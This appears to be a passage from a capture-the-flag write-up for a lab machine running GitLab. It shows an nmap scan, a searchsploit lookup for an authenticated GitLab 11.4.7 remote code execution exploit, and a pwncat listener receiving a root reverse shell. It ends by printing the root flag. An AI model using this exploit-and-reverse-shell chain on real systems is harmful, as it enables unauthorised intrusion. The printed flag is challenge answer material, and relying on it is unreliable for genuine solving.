# Nmap 7.91 scan initiated Fri Feb 5 18:56:03 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.220 Nmap scan report for 10.10.10.220 Host is up (0.030s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 5080/tcp open http nginx |_http-favicon: Unknown favicon MD5: F7E3D97F404E71D302B3239EEF48D5F2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 53 disallowed entries (15 shown) | / /autocomplete/users /search /api /admin /profile | /dashboard /projects/new /groups/new /groups/*/edit /users /help |_/s/ /snippets/new /snippets/*/edit | http-title: Sign in \xC2\xB7 GitLab |_Requested resource was http://10.10.10.220:5080/users/sign_in |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Feb 5 18:56:34 2021 -- 1 IP address (1 host up) scanned in 30.44 seconds
All the exploits are dirty and broken so I picked the first and had to modify it:
1 2 3 4 5 6 7
$ searchsploit -p 49334.py Exploit: GitLab 11.4.7 - RCE (Authenticated) URL: https://www.exploit-db.com/exploits/49334 Path: /usr/share/exploitdb/exploits/ruby/webapps/49334.py File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
$ pwncat -l 8888 -vv INFO: Listening on :::8888 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP) INFO: Client connected from 10.10.10.220:34958 (family 2/IPv4, TCP) bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell root@ready:/# id uid=0(root) gid=0(root) groups=0(root) root@ready:/# cat /root/root.txt b7f98681505cd39066f67147b103c2b3